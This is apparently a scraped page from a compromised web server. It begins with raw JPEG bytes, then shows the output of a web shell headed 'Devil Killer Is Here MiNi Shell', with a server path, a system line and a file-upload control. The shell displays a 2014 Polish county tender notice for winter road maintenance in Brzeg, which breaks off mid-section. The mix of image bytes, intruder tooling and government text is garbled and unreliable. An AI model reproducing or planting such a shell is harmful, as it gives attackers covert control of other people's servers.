JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141003/328780-N-2014.html

<p class="kh_header"><b>Brzeg: USŁUGI ZWIĄZANE  Z ZIMOWYM UTRZYMANIEM  DRÓG  POWIATOWYCH    
     W SEZONIE ZIMOWYM  2014/2015</b><br>
<b>Numer ogłoszenia: 328780 - 2014; data zamieszczenia: 03.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Brzegu , ul. Wyszyńskiego 23, 49-300 Brzeg, woj. opolskie, tel. 077 4113840, faks 077 4113845.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdpbrzeg.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI ZWIĄZANE  Z ZIMOWYM UTRZYMANIEM  DRÓG  POWIATOWYCH    
     W SEZONIE ZIMOWYM  2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi związane z zimowym utrzymaniem dróg       
       powiatowych. Realizowane  będą na terenie gmin: miasto Brzeg, gmina Skarbimierz  
       Gmina Lubsza, Gmina Olszanka,   Gmina i Miasto Grodków, Miasto i Gmina Lewin    
       Brzeski  polegające na zwalczaniu śliskości zimowej w technologii posypywania dróg 
       mieszanką piaskowo-solną, odśnieżaniu dróg oraz załadunku i pryzmowaniu materiału.    
       Usługi będą realizowane przy   użyciu następujących środków  sprzętowo-transportowych :
       - nośniki wyposażone w urządzenia systemu monitorująco -kontrolującego - 5 szt 
       - piaskarko-solarki - 5 szt ,  w tym 2 szt nowe,
       - pługi  średnie, ciężkie - 7 szt , w tym 4 pługi dociskowe hydrauliczne,  
       - nośniki do pługów wyposażone w urządzenia systemu monitorująco- kontrolującego
          - 2 szt
       - ładowarka do odśnieżania - 1 szt
       - równiarka samojezdna do odśnieżania  - 1 szt.
 Drogi objęte zamówieniem winny być utrzymywane przez cały sezon zimowy      
                2014/2015 wg trzech kolejności i standardów odśnieżania i zwalczania śliskości    
                opracowanych przez Zamawiającego i stanowiące załączniki do siwz .
    Zlecanie wykonania usług  podwykonawcom
                1.Zamawiający dopuszcza udział podwykonawców .
                2.Wykonawca może powierzyć wykonanie  zamówienia podwykonawcy.
                   W takim przypadku, Wykonawca będzie zobowiązany do wskazania w ofercie,
                   podwykonawców, lub podania przez  wykonawcę nazw (firm)podwykonawców, na 
                   których zasoby wykonawca powołuje   się określonych w art.26 ust.2b, w celu 
                   wykazania spełniania warunków udziału postępowaniu, których mowa 
                   w art.22 ust.1.
      3.Jeżeli w trakcie realizacji zamówienia nastąpi zmiana albo rezygnacja
         podwykonawcy, na którego zasoby wykonawca powołał się, na zasadach określonych
         w art. 26 ust. 2b Prawa zamówień publicznych, w celu wykazania spełnienia
                     warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Prawa zamówień  
                     publicznych, Wykonawca jest zobowiązany wykazać Zamawiającemu, iż 
                     proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu 
                     nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
          W trakcie realizacji przedmiotu zamówienia zmiana w zakresie podwykonawstwa może nastąpić tylko za zgodą Zamawiającego. W przypadku zmiany podwykonawcy Wykonawca będzie każdorazowo zobowiązany do zgłoszenia tego faktu na piśmie ze wskazaniem nazw (firmy) i adresu nowego podwykonawcy oraz części zamówienia mu powierzonej.
            W przypadku powierzenia realizacji przedmiotu zamówienia podwykonawcy, Wykonawca ponosi odpowiedzialność za działania podwykonawcy jak za własne. 
             
       Obowiązki i zadania Wykonawcy.   
         1.Wykonawca przez cały okres ważności umowy gwarantuje oddanie do 
                            dyspozycji  Zamawiającego w celu wykonania usług zimowego utrzymania  
                            dróg  ilość środków  sprzętowo-transportowych zgodną z ilością  
                            zadeklarowaną w ofercie. Wykonawca winien  przez cały okres zimowy   
                            utrzymywać sprzęt w stanie sprawnym poprzez  wykonywanie napraw i obsług   
                            technicznych. Koszty napraw i obsług technicznych ponosi Wykonawca
                            i wchodzą one w cenę jednostkową podaną w formularzu cenowym 
                            i w ofercie. 
               2.Wykonawca wyposaży na swój koszt  w ramach umowy na wykonanie   
                            usługi zimowego utrzymania dróg powiatowych  jednostki sprzętowe 
                            w system monitorująco-kontrolujący pracy sprzętu. System  
                            monitorowania pracy sprzętu przy zimowym  utrzymaniu dróg 
                            powiatowych na terenie powiatu brzeskiego powinien umożliwiać  odczyt 
                            i analizę danych w zakresie lokalizacji pojazdu, rodzaju wykonywanej 
                            pracy z prędkością z jaką porusza się pojazd. Odczyt  powinien  odbywać  
                            się czasie rzeczywistym przez przeglądarkę internetową. System powinien 
                           umożliwić  bezpośredni kontakt dyżurnego z operatorem.  Wykonawca 
                           zobowiązany do przeszkolenia wyznaczonych pracowników  Zarządu Dróg   
                           Powiatowych w Brzegu do prowadzenia akcji zimowego  utrzymania dróg  
                           w celu pełnego wykorzystania  oprogramowania systemu .
                           W razie utraty zasięgu system powinien zapewniać gromadzenie danych     
                           przez min. 5 godz. Po powrocie zasięgu urządzenie powinno natychmiast  
                           nawiązać połączenie z serwerem i przesłać zaległe dane. 
                           W przypadku  awarii systemu- czas reakcji i czas naprawy nie dłuższy niż 
                           24  godziny.
          3.Dla obsługi terenu gmin : miasto Brzeg, Skarbimierz, Lubsza i Olszanka 
                           Wykonawca musi mieć do dyspozycji plac przygotowany do składowania  
                            materiału stosowanego do zwalczania śliskości zimowej  (mieszanka             
                            piaskowo-solna) na terenie bazy m. Brzeg.
                           Zamawiający dostarczy Wykonawcy ilość materiałów niezbędną 
                           do prawidłowego przebiegu akcji  zimowej.
               4.Dla obsługi terenu gmin : Grodków i Lewin Brzeski Wykonawca musi mieć  
                           do  dyspozycji plac przygotowany do składowania materiału stosowanego 
                           do zwalczania śliskości zimowej (mieszanka piaskowo-solna) na terenie    
                           gminy  Grodków.
                           Zamawiający dostarczy Wykonawcy ilość materiałów niezbędną 
                           do prawidłowego przebiegu akcji zimowej.
             5.Wykonawca oddaje do dyspozycji Zamawiającemu w celu wykonania usług  
                            związanych z zimowym utrzymaniem dróg środki sprzętowo-transportowe    
                            


                            wraz  z operatorem (kierowcą)posiadającym kwalifikacje gwarantujące                              prawidłowe wykonanie usług.   
                            Wykonawca zobowiązany jest do podstawienia środków sprzętowo-  
                            transportowych z materiałami pędnymi i mieszanką piaskowo-solną wraz
                            z obsługą wyposażoną w odzież ochronną zimową i posiłki regeneracyjne 
                            w miejscu określonym przez  Zamawiającego nie później niż w ciągu  1 godz.   
                            od otrzymania wezwania lub  w terminie wyznaczonym przez  Zarząd Dróg  
                            Powiatowych.
              6.Wykonawca zabezpiecza podwójną obsadę kierowców i maszynistów   
                             gwarantującą  całodobową pracę. Ilość godzin pracy (praca, dyżur) jednej 
                             osoby-maksimum 12 godzin na dobę.         
                7.Wezwanie może być pisemne, ustne lub telefoniczne. Wykonawca 
                             w przypadku nasilenia niekorzystnych warunków atmosferycznych 
                             realizować będzie usługi przez 24 godziny na dobę, a jest zobowiązany 
                             zapewnić łączność telefoniczną z operatorem  (kierowcą).
                8.Wykonawca zabezpieczy odpowiednie pomieszczenia socjalne dla dyżurnych,  
                             Kierowców i operatorów środków sprzętowo-transportowych wezwanych
                             do realizacji usług (w tym dyżurów) związanych z zimowym utrzymaniem                    
                             dróg oraz przeprowadzi szkolenie  dla operatorów i kierowców środków  
                             sprzętowo-transportowych w zakresie techniki obsługi  mechanizmów  
                             jednostek sprzętowychi transportowych przy zimowym utrzymaniu dróg  
                             oraz BHP.
                9.Wykonawca zapewni realizację usług poprzez wyznaczenie dwóch  osób      
                             pełniących funkcję koordynatora pracy nośników i  sprzętu  odpowiedzialnej  
                             za prawidłowe  prowadzenie robót zimowego utrzymania dróg objętych 
                             niniejszym zamówieniem.
               10.Do obowiązków osoby odpowiedzialnej za ZUD z ramienia Wykonawcy                    
                             należy:
                             a/ zapewnienie podstawienia i rozpoczęcia pracy sprzętu w ciągu 1 godz. 
                                 od wezwania przez Zamawiającego,
                             b/ kontrola pracy sprzętu i nośników,
                             c/ w przypadku awarii sprzętu podstawienie zastępczego sprzętu 
                                 z zamontowanymi urządzeniami technicznymi o takich samych parametrach               
                                 technicznych i ilością zadeklarowaną w umowie,
                             d/ uzgadniania z Zamawiającym zmian lub przerw w pracy przy robotach  
                                 zimowego utrzymania,
                             e/ opracowania i uzgodnienia z Zamawiającym; harmonogramu pracy sprzętu
                                 i   samochodów z podaniem typu samochodu lub sprzętu, nr rejestracyjny  
                                 samochodu,  nazwisko kierowcy i adres i nr telefonu zainstalowanego 
                                 na  samochodzie,
                             f) rozliczanie finansowe wynajętego sprzętu i nośników.       
               11.Wykonawca będzie wystawiać faktury raz w miesiącu za usługi wykonane 
                              przy  odśnieżaniu i zwalczaniu   śliskości na drogach powiatowych w terminie
                              do 30 każdego miesiąca. 
               12.Usługa będzie zamawiana  sukcesywnie  do wysokości   środków 
                             finansowych posiadanych przez Zarząd Dróg Powiatowych w Brzegu.  

      Obowiązki Zamawiającego.
               1.W przypadku wystąpienia potrzeby Zamawiający przeprowadzi szkolenie dla 
                            operatorów i kierowców środków sprzętowo-transportowych w zakresie               
                            realizacji usług związanych z zimowym utrzymaniem dróg.

                            Ze strony Zamawiającego do wezwania Wykonawcy do podstawienia środków    
                            sprzętowo-transportowych upoważniony jest Kierownik Zarządu Dróg 
                            Powiatowych, Z-ca Kierownika  i Dyżurny Zarządu Dróg Powiatowych.
                2.Usługa będzie kontrolowana przez Kierownika Zarządu Dróg Powiatowych,
                            Zastępcę  Kierownika Zarządu Dróg Powiatowych i Dyżurnego Zarządu Dróg            
                            Powiatowych.
                3.Kontrola będzie przeprowadzana na bieżąco poprzez ocenę stanu przejezdności                         
                            dróg. 
                            Zamawiający nie odbierze i nie zapłaci za wadliwe, źle wykonane zlecenie.
                4.Ilość godzin pracy dyżuru jednostek sprzętowo-transportowych przy  
                            wykonywaniu   usług związanych z zimowym utrzymaniem dróg oraz ilości  
                            wysypanego na drogę materiału będą potwierdzane przez Dyżurnego Zarządu 
                            Dróg Powiatowych na kartach pracy sprzętu(raportach).
                            Oryginały dokumentów potwierdzających  ilość godzin pracy i dyżurów wraz
                            z dokumentem potwierdzającym  rozchód soli drogowej i piasku przy realizacji                   
                            usług stanowić będą podstawę do wystawienia faktury.
              5.Zamawiający wypłaci Wykonawcy należne kwoty w terminie 30 dni od daty      
                           otrzymania faktury.  
            6.Wynagrodzenie ustala się według cen jednostkowych  za 1 godz. pracy sprzętu 
                            i dyżur. 
                            Ceny podane w formularzu cenowym i w ofercie nie ulegną zmianie w trakcie  
                            realizacji zamówienia.
       Zakres usług (ilość) podana w formularzu cenowym została określona na podstawie 
       przewidywanych potrzeb w okresie sezonu 2014/2015 zimowego utrzymania dróg.
       Ilości te mają charakter orientacyjny i posłużą do ustalenia cen złożonych  ofert, 
       a w przypadku wyboru najkorzystniejszej oferty do określenia orientacyjnej wartości   
       umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) warunek zostanie uznany za spełniony, gdy wykonawca (lub partnerzy 
                             konsorcjum  łącznie) wykaże, że  posiada doświadczenie polegające 
                             na wykonaniu w okresie ostatnich  3 lat  ( 3 sezonów zimowych- 2011/2012,
                             2012/2013, 2013/2014),przed upływem terminu składania ofert, a jeżeli okres 
                             prowadzenia działalności jest krótszy - w tym okresie usługi z zakresu  
                             zimowego utrzymania dróg o łącznej wartości co najmniej 250 000,00 zł   
                             brutto, (słownie: dwieście pięćdziesiąt  tysięcy złotych 00/100),
                         2) jeżeli wykonawca będzie wykazywał  poleganie na wiedzy i doświadczeniu 
                             innego podmiotu z art.26 ust.2b - to musi wykazać wykonanie usług
                             jak  w § 5.3.1. pkt.1  siwz. Wykonawca w takiej sytuacji zobowiązany 
                             jest przedstawić pisemne zobowiązanie tego podmiotu  do udostępnienia            
                             wiedzy i doświadczenia na okres wykonywania zamówienia, na zasadzie   
                             spełnia,nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy wykonawca (lub partnerzy                                    
                         konsorcjum łącznie) wykaże, że dysponuje lub będzie dysponował niżej 
                         wymienionymi w pełni sprawnymi jednostkami sprzętu i środkami transportu 
                         zapewniającymi  wykonywanie  zamówienia :         
                         - nośniki wyposażone w urządzenia systemu monitorująco -kontrolującego 
                            - 5 szt 
                         - piaskarko-solarki - 5 szt ,  w tym 2 szt nowe ,
                         - pługi  średnie, ciężkie - 7 szt , w tym 4 pługi dociskowe hydrauliczne,  
                         - nośniki do pługów wyposażone w urządzenia systemu monitorująco -
                           kontrolującego - 2 szt
                         - ładowarka do odśnieżania - 1 szt  
                         - równiarka samojezdna do odśnieżania    - 1 szt
             - dysponuje lub będzie dysponował 2 (dwoma)  placami magazynowymi: 
                jeden na terenie gminy Brzeg,  drugi na terenie gminy Grodków lub posiada 
                pisemne zobowiązanie innego podmiotu do udostępnienia ww. jednostek 
                sprzętu , placu  na okres korzystania z nich przy wykonywaniu zamówienia 
                na zasadzie spełnia,nie spełnia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że dysponuje
                  lub będzie dysponował  odpowiednio wykwalifikowanymi i doświadczonymi 
                  pracownikami - wykonawca ma do dyspozycji pracowników posiadających 
                  niezbędne doświadczenie w zakresie zimowego utrzymania dróg, którzy    
                  pracowali minimum w 2 ostatnich sezonach zimowych 2012/13, 2013/14)
                  wymagane jest 2 koordynatorów z min. średnim wykształceniem
                  oraz podwójna obsada kierowców, operatorów do obsługi i pracy sprzętu 
                  podanego w § 5.3.2 lub posiada pisemne zobowiązanie innego podmiotu 
                  do udostępnienia ww. osób na okres korzystania z nich przy wykonywaniu 
                  zamówienia na zasadzie  spełnia, nie spełnia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że znajduje 
                             się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
                             zamówienia przez przedłożenie informacji banku lub  spółdzielczej kasy
                             oszczędnościowo-kredytowej , w których Wykonawca posiada rachunek, 
                             potwierdzającej wysokość posiadanych środków finansowych lub zdolność
                             kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed
                             upływem terminu składania ofert  minimum posiadanych środków 
                             finansowych lub zdolność kredytową w wysokości  250 000,00 PLN,
                             (dwieście pięćdziesiąt tysięcy złotych)                         2) jeżeli wykonawca polega na zdolności finansowej innego podmiotu
                             na zasadzie podanej w art.26 ust.2b ustawy Pzp należy przedłożyć 
                             informację, której mowa w § 5.3.4. pkt.1  siwz dotyczącej tego podmiotu,                 
na zasadzie spełnia,nie spełnia, 



                        W przypadku składania oferty przez wykonawców ubiegających się wspólnie
                        o udzielenie zamówienia, ww. warunki wymienione  mogą spełniać łącznie
na zasadzie spełnia /nie spełnia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) OFERTA - wg załączonego wzoru do wypełnienia - zał. nr 1,
             2) FORMULARZ CENOWY - wg załączonego wzoru do wypełnienia- zał. nr 2,
    3) zaakceptowany WZÓR  UMOWY - zał. nr 3, 
    4) druk dot. podwykonawstwa - zał. nr 11 
             5) pełnomocnictwo do podpisywania oferty/reprezentacji o ile prawo do podpisywania, 
                 reprezentacji nie wynika z innych dokumentów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany przez władzę ustawodawczą określonej  procentowej stawki podatku VAT ,    
   kwota brutto wynagrodzenia zostanie aneksem do niniejszej umowy odpowiednio  dostosowana.
Zamawiający zobowiązuje się  zapłacić  Wykonawcy za faktycznie wykonane usługi w ilości  
   i  w zakresie zależnym od warunków atmosferycznych na podstawie przedłożonych dokumentów (karty      
   drogowe, raporty sprzętu , rozliczenie materiałów : piasku i soli drogowej), stwierdzających faktyczny czas     
   pracy lub dyżuru sprzętu, zatwierdzonych przez  obie strony według cen jednostkowych przedstawionych
   w formularzu cenowym Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdpbrzeg.pl<br>
